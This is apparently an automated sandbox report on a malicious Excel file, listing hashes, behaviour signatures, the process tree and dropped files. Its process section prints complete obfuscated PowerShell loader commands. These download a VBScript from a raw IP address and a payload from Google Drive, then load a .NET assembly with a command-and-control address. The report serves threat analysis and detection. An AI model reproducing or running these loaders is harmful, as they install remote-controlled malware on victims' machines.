Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
101s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
07/11/2024, 03:18
Static task
static1
Behavioral task
behavioral1
Sample
d42ff478f1996a591e02f59a41edda8aee486e9523c14bce04be51cb457cc6e6.xls
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
d42ff478f1996a591e02f59a41edda8aee486e9523c14bce04be51cb457cc6e6.xls
Resource
win10v2004-20241007-en
General
-
Target
d42ff478f1996a591e02f59a41edda8aee486e9523c14bce04be51cb457cc6e6.xls
-
Size
1.1MB
-
MD5
9b8d94907c2db1b8ae9ebf84b2099c16
-
SHA1
d543e02897263288f2b2a65d7070757d99fed8ff
-
SHA256
d42ff478f1996a591e02f59a41edda8aee486e9523c14bce04be51cb457cc6e6
-
SHA512
cc8d24cee7a41c7cc2ddab9cd5d7ae6b245dcd90fee8b5de1d4001dae83e7c43d3cbd474bc1c4f89fa9ec903d26de680630d8b064328f07b3a04cf827182a972
-
SSDEEP
24576:1yaZxvseowaDI9eqvBw2LyifZSScF1LelExbgwCcH0p1O4uGqdzkxTm:1T0DIRvBwCv0xF1L3MwCA4uIx
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
Signatures
-
Blocklisted process makes network request 5 IoCs
flow pid Process 20 2540 mshta.exe 21 2540 mshta.exe 23 2428 POWErsHell.eXE 25 1512 powershell.exe 27 1512 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1512 powershell.exe 964 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2428 POWErsHell.eXE 2652 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 24 drive.google.com 25 drive.google.com -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk POWErsHell.eXE File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language POWErsHell.eXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a190000000100000010000000fd960962ac6938e0d4b0769aa1a64e262000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 mshta.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 840 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2428 POWErsHell.eXE 2652 powershell.exe 2428 POWErsHell.eXE 2428 POWErsHell.eXE 964 powershell.exe 1512 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2428 POWErsHell.eXE Token: SeDebugPrivilege 2652 powershell.exe Token: SeDebugPrivilege 964 powershell.exe Token: SeDebugPrivilege 1512 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 840 EXCEL.EXE 840 EXCEL.EXE 840 EXCEL.EXE 840 EXCEL.EXE 840 EXCEL.EXE -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2540 wrote to memory of 2428 2540 mshta.exe 31 PID 2540 wrote to memory of 2428 2540 mshta.exe 31 PID 2540 wrote to memory of 2428 2540 mshta.exe 31 PID 2540 wrote to memory of 2428 2540 mshta.exe 31 PID 2428 wrote to memory of 2652 2428 POWErsHell.eXE 33 PID 2428 wrote to memory of 2652 2428 POWErsHell.eXE 33 PID 2428 wrote to memory of 2652 2428 POWErsHell.eXE 33 PID 2428 wrote to memory of 2652 2428 POWErsHell.eXE 33 PID 2428 wrote to memory of 1636 2428 POWErsHell.eXE 34 PID 2428 wrote to memory of 1636 2428 POWErsHell.eXE 34 PID 2428 wrote to memory of 1636 2428 POWErsHell.eXE 34 PID 2428 wrote to memory of 1636 2428 POWErsHell.eXE 34 PID 1636 wrote to memory of 1932 1636 csc.exe 35 PID 1636 wrote to memory of 1932 1636 csc.exe 35 PID 1636 wrote to memory of 1932 1636 csc.exe 35 PID 1636 wrote to memory of 1932 1636 csc.exe 35 PID 2428 wrote to memory of 1724 2428 POWErsHell.eXE 36 PID 2428 wrote to memory of 1724 2428 POWErsHell.eXE 36 PID 2428 wrote to memory of 1724 2428 POWErsHell.eXE 36 PID 2428 wrote to memory of 1724 2428 POWErsHell.eXE 36 PID 1724 wrote to memory of 964 1724 WScript.exe 37 PID 1724 wrote to memory of 964 1724 WScript.exe 37 PID 1724 wrote to memory of 964 1724 WScript.exe 37 PID 1724 wrote to memory of 964 1724 WScript.exe 37 PID 964 wrote to memory of 1512 964 powershell.exe 39 PID 964 wrote to memory of 1512 964 powershell.exe 39 PID 964 wrote to memory of 1512 964 powershell.exe 39 PID 964 wrote to memory of 1512 964 powershell.exe 39
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\d42ff478f1996a591e02f59a41edda8aee486e9523c14bce04be51cb457cc6e6.xls1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:840
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\SysWOW64\WiNdowSpOWerShelL\v1.0\POWErsHell.eXE"C:\Windows\SYsTEM32\WiNdowSpOWerShelL\v1.0\POWErsHell.eXE" "pOWErsheLl.exE -EX BypaSS -NOp -w 1 -C DeVIcecRedentiaLDepLoYmENT.eXE ; IeX($(IEx('[syStEm.tEXt.ENcoDing]'+[ChaR]58+[char]58+'Utf8.getStRInG([SYStEm.CONVERT]'+[CHaR]0x3a+[cHaR]0x3A+'fROmbASe64stRinG('+[cHar]0x22+'JEE5QjJqICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9OLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRwY1VPTmRSLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdjWFpDLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRNVXVCLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNdGZMc256LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEliQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImRkUGJnTElwWEIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVTUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEthSXZOWFFvICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBOUIyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNDYvMjE3L3NlZXRoZWJlc3R0aGluZ3N3aXRoZ29vZG5ld3NnaXZlbm1lZ3JlYXR3YXlzLnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0dGhpbmdzd2l0aGdvb2RuZXdzZ2l2ZW5tZWdyZWF0dy52YnMiLDAsMCk7U1RBcnQtU2xFZXAoMyk7c1RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3N3aXRoZ29vZG5ld3NnaXZlbm1lZ3JlYXR3LnZicyI='+[ChAr]34+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BypaSS -NOp -w 1 -C DeVIcecRedentiaLDepLoYmENT.eXE3⤵
- Evasion via Device Credential Deployment
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2652
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xnxpjgur.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1636 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5BF6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5BE6.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:1932
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswithgoodnewsgivenmegreatw.vbs"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzaG9NRVsyMV0rJFBzaG9NZVszNF0rJ3gnKSggKCc3eicrJ3hpbWFnZVVybCA9IEs5a2h0dHBzOi8vZHJpdicrJ2UuZ29vZ2xlLmNvbS91Yz9leHBvcnQnKyc9ZG93bmxvYWQmaWQ9MVV5SHF3cm5YQ2xLQkozajYzTGwxdDJTdFZnR3hiU3QwIEs5azs3eicrJ3h3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OZXQuJysnV2ViQ2xpZW50Ozd6eGknKydtYWdlQnl0JysnZXMgPSA3eicrJ3h3ZWJDbGllbnQuRG93bmxvYWREYXRhKDd6eGltYWdlVXJsKTs3enhpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg3enhpbWFnZUJ5dGVzKTs3enhzdGFydEZsYWcgPSBLOWs8PEJBU0U2NF9TVEFSVD4+SzlrOzd6eGUnKyduZEZsYWcgPSBLOWs8PEJBU0U2NF9FTkQ+Pks5azs3enhzdGFydEluZGV4ID0gN3p4aW1hZ2VUZXh0LkluZGV4T2YoN3p4c3RhcnRGbGFnKTsnKyc3enhlbmRJbmRleCA9IDd6eGltYWdlVGV4dC5JbmRleE9mKDd6JysneGVuZEZsYWcpOzd6eHN0YXJ0SW5kZXggLWcnKydlIDAgLWFuZCA3JysnenhlbmRJbicrJ2RleCAtZ3QgN3onKyd4c3RhcnRJbmQnKydleDs3enhzdGFydEluZGV4ICs9IDd6eHN0YXJ0RmxhZy5MZW5ndGg7N3p4YmFzZTYnKyc0TGVuZ3RoID0gN3p4ZW5kJysnSW5kZXggLSA3enhzdGFydEluZCcrJ2UnKyd4Ozd6eGJhc2U2NENvbW1hbmQnKycgPSA3enhpbWFnZVQnKydleHQuU3Vic3RyaW5nKDd6eHN0YXJ0SW5kZXgsJysnIDd6eGJhc2U2NExlbmd0aCk7N3p4YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoN3p4YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGFDeCBGb3JFYWNoLU9iamVjdCB7IDd6eF8gfSknKydbLTEuLi0oN3p4YmFzZTY0Q29tbWFuZC5MZScrJ25ndGgpXTs3enhjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDd6JysneGJhc2U2NFJldmVyc2VkKTs3enhsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdCcrJ2lvbi5Bc3NlbWJseV06OicrJ0xvYWQoN3p4Y29tbWFuZEJ5dGVzKTs3enh2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKEs5a1ZBSUs5ayk7N3p4dmFpTWV0aG9kLkludm9rZSg3enhudWxsLCBAKEs5a3R4dC5SUklNTUEnKydDLzcxMi82NDEuMzkxLjMuMjkxLy86cCcrJ3R0aEs5aywgSzlrZGVzYXRpdmFkb0s5aywgSzlrZGVzYXRpdmFkJysnb0s5aywgSzlrZGVzYXRpdmFkb0s5aywgSzlrYXNwbmV0X2NvbXBpbGVySzlrLCBLOWtkZXNhdGl2YWRvSzlrLCAnKydLOWtkJysnZXNhdGl2YWRvSzlrLEs5a2Rlc2F0aXZhZG9LOWssSzknKydrZGVzYScrJ3RpdmFkb0s5ayxLOWtkZXNhdGl2YWQnKydvSzlrLEs5a2Rlc2F0aXZhZG9LOWssSzlrZGUnKydzYXRpdmFkb0s5ayxLOWsxSzlrLEs5a2Rlc2F0aXZhZG9LOWspKTsnKS5SRXBsYUNFKCdhQ3gnLFtTVFJJbmddW0NIQVJdMTI0KS5SRXBsYUNFKChbQ0hBUl03NStbQ0hBUl01NytbQ0hBUl0xMDcpLFtTVFJJbmddW0NIQVJdMzkpLlJFcGxhQ0UoJzd6eCcsJyQnKSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $pshoME[21]+$PshoMe[34]+'x')( ('7z'+'ximageUrl = K9khttps://driv'+'e.google.com/uc?export'+'=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 K9k;7z'+'xwebClient = New-Object Sys'+'tem.Net.'+'WebClient;7zxi'+'mageByt'+'es = 7z'+'xwebClient.DownloadData(7zximageUrl);7zximageText = [System.Text.Encoding]::UTF8.GetString(7zximageBytes);7zxstartFlag = K9k<<BASE64_START>>K9k;7zxe'+'ndFlag = K9k<<BASE64_END>>K9k;7zxstartIndex = 7zximageText.IndexOf(7zxstartFlag);'+'7zxendIndex = 7zximageText.IndexOf(7z'+'xendFlag);7zxstartIndex -g'+'e 0 -and 7'+'zxendIn'+'dex -gt 7z'+'xstartInd'+'ex;7zxstartIndex += 7zxstartFlag.Length;7zxbase6'+'4Length = 7zxend'+'Index - 7zxstartInd'+'e'+'x;7zxbase64Command'+' = 7zximageT'+'ext.Substring(7zxstartIndex,'+' 7zxbase64Length);7zxbase64Reversed = -join (7zxbase64Command.ToCharArray() aCx ForEach-Object { 7zx_ })'+'[-1..-(7zxbase64Command.Le'+'ngth)];7zxcommandBytes = [System.Convert]::FromBase64String(7z'+'xbase64Reversed);7zxloadedAssembly = [System.Reflect'+'ion.Assembly]::'+'Load(7zxcommandBytes);7zxvaiMethod = [dnlib.IO.Home].GetMethod(K9kVAIK9k);7zxvaiMethod.Invoke(7zxnull, @(K9ktxt.RRIMMA'+'C/712/641.391.3.291//:p'+'tthK9k, K9kdesativadoK9k, K9kdesativad'+'oK9k, K9kdesativadoK9k, K9kaspnet_compilerK9k, K9kdesativadoK9k, '+'K9kd'+'esativadoK9k,K9kdesativadoK9k,K9'+'kdesa'+'tivadoK9k,K9kdesativad'+'oK9k,K9kdesativadoK9k,K9kde'+'sativadoK9k,K9k1K9k,K9kdesativadoK9k));').REplaCE('aCx',[STRIng][CHAR]124).REplaCE(([CHAR]75+[CHAR]57+[CHAR]107),[STRIng][CHAR]39).REplaCE('7zx','$') )"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1512
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\75CA58072B9926F763A91F0CC2798706_056B48C93C4964C2E64C0A8958238656
Filesize1KB
MD53e652ebfb9e701d6bd515f81d762331d
SHA146cc56c7a8d342f3fa14d7ceb19b4d48a699072e
SHA2569d1b4927244aa7e9cf87639c48fa5a5bea959765680f195ca6253f62792e122d
SHA512a2c4859b5c6363968478851fdb4e8098535c0bcc0f6fab48252536898141d72fdf1ec4b14a1f75817bee457eaac662ce6f95be785c0745763e4f82998614a8e9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62
Filesize2KB
MD566b8e52f6d682ffbbb3baca244831960
SHA1a6f6336d059949a32273a491a8b99832804770a3
SHA2568fb788a5d531dc1bface8c316635c407b96b881a1dc65812d63e13095d784aad
SHA512af041ecbc4385b6df1b0618e7b3a22de0e51c94907c053d84cd80518d18e9b8b4009f4771581e7ddf14891569054d9173a0a39fd3cc2b64a244513915fcbf92f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894
Filesize1KB
MD5cc0416733fe9f2211840ff355ceb5fad
SHA117b801484ecda2a3badb814e02d56b11ca768d81
SHA256b0cd53b7f50a9d79caa2e78864aab2bc68d115cb35829a2b451ca653a7e26481
SHA51230db6ef8a485076dca3f76848bd4e0d55e480c7b868fb03f44cd95ab381d83f36ab228acd6a97d71a5d4d0c1d9bced9e9ff9e1971314051c3f8316108bae4943
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F53EB4E574DE32C870452087D92DBEBB_2EEDDB29953A46217D3D6BE21EA36A5B
Filesize471B
MD58955bb560abf515e94ca68dd87ef93b4
SHA1edfe758796fd694f425d843c9d68689485743a4d
SHA256e8da732b763426bd055a381d3647dc506f3c5d14fe0bf6e0b174c2365306c3c4
SHA512ce74e7a1fd0b5baa6781d54dca087e81b8f9f68582ca935a40fd235510ed15ce8351561d8bda74f584a01225e63e5bcf99dd16953c8efb03064435aad7153173
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\75CA58072B9926F763A91F0CC2798706_056B48C93C4964C2E64C0A8958238656
Filesize434B
MD55f92c2caa4bcd2061af1d8656ec4ad7d
SHA172ec7878aac542fe23da4b1926c7298adf2ebd78
SHA256f822c5c53c6bb3c31c7106b420ff2f717e3c4b25d5bb181d2e17ae8849886210
SHA512181aa54110c84fb0f6a69d0af9df437ddbc2823a729f25b5bbf0016d6d834d6587acb3c5c70679c6dd091ac321389593fa0b944842c8f453306130e9c98b6867
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5e4f18e168d45a34999bbc72a47fb4c72
SHA132540425d1e4b040dcac255e27bba392a154528b
SHA256671efce174efe9bbf2b581c14524762d36af43ce1824fae84ab6afb0970325aa
SHA51212ecc1fb0619a0d499c7c9399dca467298adcbeee1fa0adb8291bd4e12af7fe3cb1df7c9b90b35655d37753f7ac62bac540f454cc4e0886f70c0ae5bef01d4fc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD511beaa8c508c0d9b13fddeca4daaf6ab
SHA167a150ad5039dfc5145e7a20bf3346ad2be71ece
SHA2566f765e3805d1cd0e5eb35b42458694c6c1b6cca6ed2e31f04f25bed6655a3d42
SHA512319de834b06e57064cfe7dbea1de4c9c8df578eca45c328f25e4891f6a81fc0597dd220c920cdca6ec6ea08d9313a4def5fe6972f0aa854cfdf20ccb8e55461f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62
Filesize458B
MD53006b04e64f5a2a1f7d8d4d5fe9e165f
SHA148ee99c8e4eac0950c7e284aa73c03290bfdd7da
SHA256c9c77de0dd1b3a25d26685945d5cfe4bcda2002ee828d42c79e041fc10bd39f7
SHA51224a21f4ac32089a9c442f2bbbab7c75c0cb7f6bf58932421ef46c8b523195e536520fa615795f0f2ce48b111906135f106d4d7043ba9c61711e14dd24a8fac45
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894
Filesize432B
MD58926de42b009c839ba6fee717e05224c
SHA196e282be739b499206c7e59308ca5db916a53f58
SHA25668762245efc87ee716b7dfa8a54cedc243894300084c2096a391f9bf9d1f0891
SHA5121bfdc869fb466b5b9cd4b4b8342d68eefac50e203e987f3e13b7a87ea685d21e276afeca46d37fdb31eebed2e5288bca6cde47107f63ed772db099d1b40a5f1a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F53EB4E574DE32C870452087D92DBEBB_2EEDDB29953A46217D3D6BE21EA36A5B
Filesize426B
MD59c7b1b244d1c1f3b0bbccc1bddc3886e
SHA1dea53c150d7e95d3f1d8302ba2da717067c162e9
SHA2568fecf362484ca2c904ac0f1020c92eb1d8d1fa0789865b9d213aac657df3641c
SHA51268c1f513267379d91b965671d95f9d27e615bc23f1aef13965c2a24bda8d651e9906113572a5b741c6132bc139efd95b74bb246f24db598f046044abd7efef19
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DUME8XYE\wecreatdbestthingswithgreatthingsentiretimeeverywheregoodhappy[1].hta
Filesize8KB
MD5552093c811bbc7be144296b66144b9a2
SHA167377ed35b84dd08b6bd1612d20379cc31482e18
SHA25692251c4a9e0172e074c732ed052251b68d15843b00b466dc233fcb211ec02140
SHA5120bb1ccee11b257097ca5e828fcdb02ea6b4283975bfa17bc6a86b579d020177a33c30b7f9fff27157caa03b1ffc52e1929633a322180fafaac680f252dae979a
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD5ef5768950f2875616adf4d81e5cd5e70
SHA160a79022128e0a83e5812bfdeae6eae9785fae15
SHA25683f8749d231a7322f176e54f045e7be2e5c1e2012e7d4671870822db8306f319
SHA512c4ef5c4a87e772574be663f9f17e60f0bd6815af47b7e115b601251ad1268b4eeff0e596405046d911bce735833e3233db4b7713a5ddf2e534e762e81039dbda
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
3KB
MD5531065ae2d5daf7ae6451d4fc92089b9
